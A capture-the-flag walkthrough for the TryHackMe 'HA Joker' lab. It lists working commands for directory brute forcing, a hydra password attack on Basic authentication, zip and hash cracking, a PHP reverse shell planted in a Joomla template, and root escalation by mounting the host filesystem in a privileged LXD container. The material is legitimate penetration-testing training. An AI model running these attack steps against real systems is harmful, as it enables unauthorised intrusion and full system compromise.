TryHackMe-HA Joker CTF-Walkthrough

Batman hits Joker.

Description :

We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

1. Enumerate Services
   - Nmap
2. Bruteforce
   - Performing Bruteforce on files over http
   - Performing Bruteforce on Basic Authentication
3. Hash Crack
   - Performing Bruteforce on hash to crack zip file
   - Performing Bruteforce on hash to crack mysql user
4. Exploitation
   - Getting a reverse connection
   - Spawning a TTY Shell
5. Privilege Escalation
   - Get root taking advantage of flaws in LXD

so let’s begin our challenge

Task 1 :Enumerate services on target machine.

nmap -sV -sC -A ip 

Task 2 : What version of Apache is it?

Answer : 2.4.29

Task 3 : What port on this machine not need to be authenticated by user and password?

Answer : 80

Task 4 : There is a file on this port that seems to be secret, what is it?

let’s use gobuster or dirbsearch …. to find intresting file or directory with extension file

gobuster dir -u "http://ip_machine" -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Answer : secret.txt

Task 5 : There is another file which reveals information of the backend, what is it?

in the same screenshoot we find a file with extension .php

Answer : phpinfo.php

Task 6 : When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?

so let’s visit ip/secret.txt or we can use curl , i visit the web site

curl -s http://ip/secret.txt

Answer : jocker

Task 7 : What port on this machine need to be authenticated by Basic Authentication Mechanism?

Answer : 8080

Task 8 : At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?

let’s use hdra to find the password with user : jocker , or you can use burp suite in this case let’s use hydra with rockyou.txt or other password list

 hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 ip_machine http-get

Answer : hannah

Task 9 : Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

There is a robots.txt file ,that discloses several locations, one of which (/administrator/) being particularly interesting:

curl -s -H "Authorization: Basic am9rZXI6aGFubmFo" http://ip_machine:8080/robots.txt

Answer : /administrator/

Task 10 : We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

let’s use gobuster and add some extension file

gobuster dir -U joker -P hannah -u http://ip_machine:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/dirb/common.txt

Answer : backup.zip

Task 11 : We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?

let’s discover the new folder and let’s downloads it and uncompress it, let’s use wget with the credential that we got it

 wget --user=joker --password=hannah http://ip_machine:8080/backup.zip

but when we want to uncompress it it demand a password

let’s try to crack it using zip2john or fcrackzip , i use fcrackzip and i found it

Answer : hannah

Task 12 : Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

when we ucompress it , we found 2 folder db and site let’s visit site , and let’s check configuration.php , i try to get just the first 20 ligne using head

 head -n20 configuration.php

But since we don’t have access to the database currently, we are more interested in valid users to access the Joomla website. let’s back to folder db

Let’s search for the interesting table:

$ grep CREATE TABLE joomladb.sql | grep user

And now that we know the table:

$ grep cc1gr_users joomladb.sql

Answer : admin

Task 13 : Super Duper User! What is the password?

in the previous screenshot we found a hash password of the admin “ $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG”

let’s try to crack it with john , first let’s save it into file admin.hash

Answer : abcd1234

Task 14 : At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?

We are now able to authenticate with admin:abcd1234 to the administration backend of Joomla. Let’s create a webshell.

From the Control Panel go to Configuration > Templates > Templates > Beez3 Details and Files. Click on error.php to edit the code and replace it with a PHP reverse shell ( http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz)

and here we goooo ! !!!

Answer : www-data

Task 15 : This user belongs to a group that differs on your own group, What is this group?

We are member of the lxd group, which reveals the presence of a linux container (check the hints)

Answer : lxd

Task 16 : Spawn a tty shell.

we can do that as follows:

$ SHELL=/bin/bash script -q /dev/null

Or with python:

$ python3 -c "import pty;pty.spawn('/bin/bash')"

Task 17 : In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.

Read documentation about LXC / LXD: https://linuxcontainers.org/lxd/introduction/

Task 18 : Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.

Now, let’s list the images installed let’s use

lxc image list

Task 19 : The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

if you don’t have a myalpine image. If you have an empty list, you can install it yourself.

First download the image on your machine:

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine

Transfer the resulting tar.gz file (e.g. alpine-v3.12-x86_64-20200623_1255.tar.gz) to the target.

Now, on the target, import the image.

lxc image import alpine-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
<-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
lxc image list

Answer : myalpine

What is the name of the file in the /root directory?

just use this and visit /root

lxc init myalpine joker -c security.privileged=true
lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
lxc start joker
lxc exec joker /bin/sh

Answer final.txt

thank you for taking time and read my writes you feedback is very important to me thank you !